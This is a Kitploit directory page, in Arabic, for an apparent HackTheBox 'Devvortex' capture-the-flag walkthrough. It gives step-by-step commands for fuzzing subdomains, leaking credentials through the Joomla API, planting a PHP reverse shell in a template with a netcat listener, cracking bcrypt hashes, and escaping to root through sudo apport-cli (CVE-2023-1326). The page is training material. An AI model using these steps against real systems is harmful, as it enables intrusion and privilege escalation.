Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
DEVVORTEX — جولة HackTheBox Devvortex التي تغطي استكشاف النطاقات الفرعية، وتعداد Joomla API، وقشرة ويب قائمة على القوالب، وكسر تجزئة bcrypt، وتصعيد الصلاحيات عبر Apport-CLI CVE-2023-1326. | Kitploit
أدوات/GitHubGitHub/r3fr4kt/devvortex
كسر كلمات المرورتصعيد الامتيازاتتحليل الثغرات الأمنيةاستغلال تطبيقات الويبجمع المعلوماتCTFاختبار الاختراقتعداد النطاقات الفرعيةالتعلم والتعليممختبرات وتدريب عملي
GitHubr3fr4kt/devvortex

DEVVORTEX

منذ 7س 58دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

جولة HackTheBox Devvortex التي تغطي استكشاف النطاقات الفرعية، وتعداد Joomla API، وقشرة ويب قائمة على القوالب، وكسر تجزئة bcrypt، وتصعيد الصلاحيات عبر Apport-CLI CVE-2023-1326.

عرض المستودع

DEVVORTEX

HackTheBox: Devvortex — شرح تفصيلي للجهاز

شرح تقني شامل يوثّق عملية اختراق جهاز Devvortex على منصة HackTheBox. يوضح هذا المسار استكشاف النطاقات الفرعية (Subdomain Fuzzing)، وتعداد واجهة Joomla API، وتعديل القوالب (Template Modification) للوصول الأولي، واستخراج وتكسير تجزئات قاعدة البيانات (Database Hash Extraction & Cracking) للتحرك الجانبي، واستغلال Apport-CLI (CVE-2023-1326) لتصعيد الصلاحيات إلى root.


الملخص التنفيذي

  • نظام التشغيل المستهدف: Linux
  • مستوى الصعوبة: سهل
  • النطاق: devvortex.htb
  • النطاق الفرعي: dev.devvortex.htb
  • المفاهيم الأساسية: تعداد النطاقات الفرعية، استغلال Joomla CMS، تسريب المعلومات، تكسير تجزئات Bcrypt، إساءة استخدام Sudo (apport-cli).

1. الاستطلاع والتعداد

فحص المنافذ (Nmap)

تم إجراء اكتشاف سريع لمنافذ TCP عبر جميع المنافذ:

root@kitploit:~
nmap -Pn -n -p- --open --min-rate 5000 <TARGET_IP>

تم تنفيذ فحص لاحق لاكتشاف الخدمات والإصدارات على المنافذ المفتوحة المحددة:

Bash

root@kitploit:~
nmap -sCV --min-rate 5000 -p22,80 <TARGET_IP>

إعداد ملف المضيفين (Hostfile)

أضف نطاق الهدف الأساسي إلى جدول تحليل أسماء المضيفين المحلي:

Bash

root@kitploit:~
sudo nano /etc/hosts
# Append: <TARGET_IP> devvortex.htb

اكتشاف النطاقات الفرعية (FFUF)

استكشاف المضيفين الافتراضيين لتحديد أصول ويب إضافية:

Bash

root@kitploit:~
ffuf -u [http://FUZZ.devvortex.htb](http://FUZZ.devvortex.htb) -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ

النتيجة: تم اكتشاف dev.devvortex.htb. تمت إضافة dev.devvortex.htb إلى /etc/hosts.

استكشاف المجلدات (Directory Fuzzing)

تعداد المسارات على المضيف الافتراضي المكتشف حديثًا:

Bash

root@kitploit:~
ffuf -u [http://dev.devvortex.htb/FUZZ](http://dev.devvortex.htb/FUZZ) -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt:FUZZ

النتيجة: تم اكتشاف نقطة النهاية /administrator، مما كشف عن بوابة مصادقة إدارية لـ Joomla.

2. الوصول الأولي (Foothold)

تسريب المعلومات عبر Joomla API

استكشاف نقاط النهاية العامة التي تكشف عنها واجهة Joomla REST API لجمع مقاييس التطبيق والمستخدمين الحساسة:

Bash

root@kitploit:~
curl -s [http://dev.devvortex.htb/api/index.php/v1/users?public=true](http://dev.devvortex.htb/api/index.php/v1/users?public=true)
curl -s [http://dev.devvortex.htb/api/index.php/v1/application?public=true](http://dev.devvortex.htb/api/index.php/v1/application?public=true)

حقن Web Shell عبر قوالب الموقع

باستخدام بيانات الاعتماد المكتشفة أثناء التعداد، سجّل الدخول إلى بوابة /administrator الخاصة بـ Joomla:

  1. انتقل إلى System > Site Templates.

  2. اختر القالب النشط وافتح error.php.

  3. استبدل محتويات error.php بحمولة PHP reverse shell قياسية.

قم بتهيئة مستمع netcat محلي:

Bash

root@kitploit:~
nc -lvnp 4444

قم بتشغيل تنفيذ error.php عبر طلب صفحة غير موجودة أو الوصول إلى الملف مباشرة.

تثبيت TTY Shell

بمجرد اتصال الـ shell كمستخدم www-data، أنشئ جلسة PTY تفاعلية:

Bash

root@kitploit:~
python3 -c 'import pty; pty.spawn("/bin/bash")'

3. التحرك الجانبي (Logan)

تعداد قاعدة البيانات

ادخل إلى قاعدة بيانات MySQL المحلية باستخدام بيانات الاعتماد المستخرجة من ملفات إعدادات الويب:

Bash

root@kitploit:~
mysql -u lewis -p

استعلم عن جدول المستخدمين لتحديد تجزئات بيانات الاعتماد المخزنة:

SQL

root@kitploit:~
SHOW DATABASES;
USE joomla;
SHOW TABLES;
SELECT username, password FROM sd4fg_users;

تكسير كلمات المرور دون اتصال

استخرج تجزئة كلمة مرور bcrypt للمستخدم logan إلى ملف محلي:

Bash

root@kitploit:~
nano hash.txt

قم بتكسير التجزئة باستخدام John the Ripper مع rockyou.txt:

Bash

root@kitploit:~
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

المصادقة عبر SSH

أنشئ جلسة SSH دائمة كمستخدم logan باستخدام بيانات الاعتماد المكسورة:

Bash

root@kitploit:~
ssh [email protected]

علم المستخدم (User Flag)

Bash

root@kitploit:~
cat user.txt

4. تصعيد الصلاحيات

تدقيق صلاحيات Sudo

افحص الملفات التنفيذية المسموح بها للمستخدم logan:

Bash

root@kitploit:~
sudo -l

المخرجات: يمكن للمستخدم تشغيل /usr/bin/apport-cli بصلاحيات root.

استغلال Apport-CLI (CVE-2023-1326)

تحقق من الإصدار المثبّت من apport-cli:

Bash

root@kitploit:~
apport-cli --version

افحص /var/crash بحثًا عن ملفات التقارير الموجودة. إذا كانت فارغة، قم بإنشاء ملف انهيار يدويًا:

Bash

root@kitploit:~
echo "ProblemType: Crash" > /var/crash/.crash

قم بتشغيل apport-cli على ملف الانهيار المُنشأ باستخدام sudo:

Bash

root@kitploit:~
sudo /usr/bin/apport-cli -c /var/crash/.crash
  1. اضغط على v لـ View report.

  2. عندما يقوم المُرقّم (less) بتحميل المحتوى، اخرج إلى shell النظام عبر إدخال:

Plaintext

root@kitploit:~
!/bin/bash

5. توحيد النظام

تحقق من رفع الصلاحيات إلى root:

Bash

root@kitploit:~
whoami
# Output: root

علم الروت (Root Flag)

Bash

root@kitploit:~
cat /root/root.txt
تنزيل الأداة